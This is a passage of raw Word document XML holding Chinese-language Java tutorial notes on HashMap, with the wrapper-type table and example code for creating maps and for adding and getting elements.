        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Cloneable</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>java.io.Serializable</w:t>
      </w:r>
      <w:r>
        <w:t>接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F48E7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="05E85197" wp14:editId="3C8ECAC6">
            <wp:extent cx="4362450" cy="2195830"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13970"/>
            <wp:docPr id="2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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId217"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4362450" cy="2195830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B6A43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:t>类型可以相同也可以不同，可以是字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>）类型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r>
        <w:t>，也可以是整型（</w:t>
      </w:r>
      <w:r>
        <w:t>Integer</w:t>
      </w:r>
      <w:r>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key </w:t>
      </w:r>
      <w:r>
        <w:t>和字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>）类型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F87B2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E99A02B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Map&lt;String, String&gt; map = Map.of(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>google</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>google.com</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runoob</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runoob.com</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A28E61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Map&lt;Integer, String&gt; map = Map.of(1, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>google</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runoob</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753CE358" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BEAAB71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的元素实际上是对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BFED49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本类型对应的包装类表如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FEDE30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699EBB04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>基本类型</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>引用类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097971A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309EE69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0BE458" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Short</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643F8A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A631A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB7C22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65DB21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Double</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D942BFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1868B985" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A1DBAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>类位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> java.util </w:t>
      </w:r>
      <w:r>
        <w:t>包中，使用前需要引入它，语法格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074D303" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">import java.util.HashMap; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFF428" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D662BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>以下实例我们创建一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sites</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>整型（</w:t>
      </w:r>
      <w:r>
        <w:t>Integer</w:t>
      </w:r>
      <w:r>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key </w:t>
      </w:r>
      <w:r>
        <w:t>和字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>）类型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B970669" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>HashMap&lt;Integer, String&gt; Sites = new HashMap&lt;Integer, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDDDFDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1BC2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>类提供了很多有用的方法，添加键值对</w:t>
      </w:r>
      <w:r>
        <w:t>(key-value)</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>put()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD3902" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480C4B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0762CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0565D613" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RunoobTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED23F97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE4F88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359DFFC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        HashMap&lt;Integer, String&gt; Sites = new HashMap&lt;Integer, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096A5A4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>添加键值对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016E9C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Sites.put(1, "Google");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A126A48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(2, "Runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F84057A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(3, "Taobao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2F170" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(4, "Zhihu");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3585208B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(Sites);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3E3994" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133CEBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8EF8AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E72B1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>执行以上代码，输出结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DD3B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{1=Google, 2=Runoob, 3=Taobao, 4=Zhihu}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F3D8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="719" w:name="OLE_LINK22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>访问元素</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="719"/>
    <w:p w14:paraId="15C8A3DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4308C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3F284" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556B64FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RunoobTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140DBF69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74EAE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16644589" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        HashMap&lt;Integer, String&gt; Sites = new HashMap&lt;Integer, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCC5371" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>添加键值对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9D224" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(1, "Google");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFA2D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(2, "Runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19470460" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(3, "Taobao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F8A6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(4, "Zhihu");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE503D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Sites.get(3)</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4089096E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B8F8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF4F8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
